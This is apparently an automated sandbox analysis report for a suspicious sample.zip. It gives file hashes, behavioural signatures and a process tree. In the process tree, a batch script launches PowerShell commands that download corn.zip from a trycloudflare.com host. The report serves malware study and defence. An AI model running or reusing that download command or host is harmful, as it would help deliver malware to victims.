Analysis
max time kernel: 1563s
max time network: 1565s
platform: windows7_x64
resource: win7-20240704-en
resource tags: arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
submitted: 26-09-2024 13:58
Static task: static1
Behavioral task: behavioral1
  Sample: sample.zip
  Resource: win7-20240704-en
Behavioral task: behavioral2
  Sample: sample.zip
  Resource: win10-20240404-en
Behavioral task: behavioral3
  Sample: sample.zip
  Resource: win10v2004-20240802-en
Behavioral task: behavioral4
  Sample: sample.zip
  Resource: win11-20240802-en
General
Target: sample.zip
Size: 42.8MB
MD5: 7579c349d3f04d81d16020218b4b014e
SHA1: 7299091625d2af8508e6c3e07e236ee47ac4400a
SHA256: 0366ac31796c460c24e7d71469e86f4c7e9509f3b52f4c24921d19d7b5786f16
SHA512: 6e7a4f071e8c74686d18892768e8158d00fba5bebad9bd0947374b08b79b7b0fa87f756618ad80ba5728db71db42a556fad990066f9d87232c0c2e35d00e3e94
SSDEEP: 786432:oDXXuerfHkIZf06hLwbl9Pm2TW38ZF+oxwk4fbSep82zpMN8:oDnXfHkIZcXM2TdZooxwnXWN8
Malware Config
Signatures
Command and Scripting Interpreter: PowerShell 2 IoCs
pid   Process
1652  powershell.exe
1508  powershell.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid   Process
1652  powershell.exe
1508  powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs
description                        pid   Process
Token: 33                          912   AUDIODG.EXE
Token: SeIncBasePriorityPrivilege  912   AUDIODG.EXE
Token: 33                          912   AUDIODG.EXE
Token: SeIncBasePriorityPrivilege  912   AUDIODG.EXE
Token: SeDebugPrivilege            1652  powershell.exe
Token: SeDebugPrivilege            1508  powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs
description                         pid  Process  procid_target
PID 908 wrote to memory of 1652     908  cmd.exe  38
PID 908 wrote to memory of 1652     908  cmd.exe  38
PID 908 wrote to memory of 1652     908  cmd.exe  38
PID 908 wrote to memory of 1508     908  cmd.exe  39
PID 908 wrote to memory of 1508     908  cmd.exe  39
PID 908 wrote to memory of 1508     908  cmd.exe  39
Processes
- C:\Windows\Explorer.exe
  Command line: C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\sample.zip
  PID: 1984
- C:\Windows\explorer.exe
  Command line: "C:\Windows\explorer.exe"
  PID: 1980
- C:\Windows\system32\AUDIODG.EXE
  Command line: C:\Windows\system32\AUDIODG.EXE 0x4e4
  Signatures: Suspicious use of AdjustPrivilegeToken
  PID: 912
- C:\Windows\system32\cmd.exe
  Command line: cmd /c ""C:\Users\Admin\Documents\sample\corn.bat" "
  Signatures: Suspicious use of WriteProcessMemory
  PID: 908
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://myspace-step-singh-headers.trycloudflare.com/corn.zip' -OutFile 'C:\Users\Admin\Downloads\corn.zip' } catch { exit 1 }"
    Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    PID: 1652
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://myspace-step-singh-headers.trycloudflare.com/corn.zip' -OutFile 'C:\Users\Admin\Downloads\corn.zip' } catch { exit 1 }"
    Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    PID: 1508
Network
MITRE ATT&CK Enterprise v15
Downloads
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: 43139d7fa5f8f17cb66e698b3ab40005
  SHA1: ec9c2e3cc0ee7e0e2136dc96bd4402b461b8a64a
  SHA256: 7fd312245c16a943b83fab4698b6753fefb5a3a55e7b0fa6ff3fdfc6e1d93454
  SHA512: 3faf3801996afb60ad0d245fec488a5e96db8e3c4addf5c6a3a12f3053ad906a10ecb90fa7767b401081715493d993070df8e3fb8653e7cc7713eba14b34a568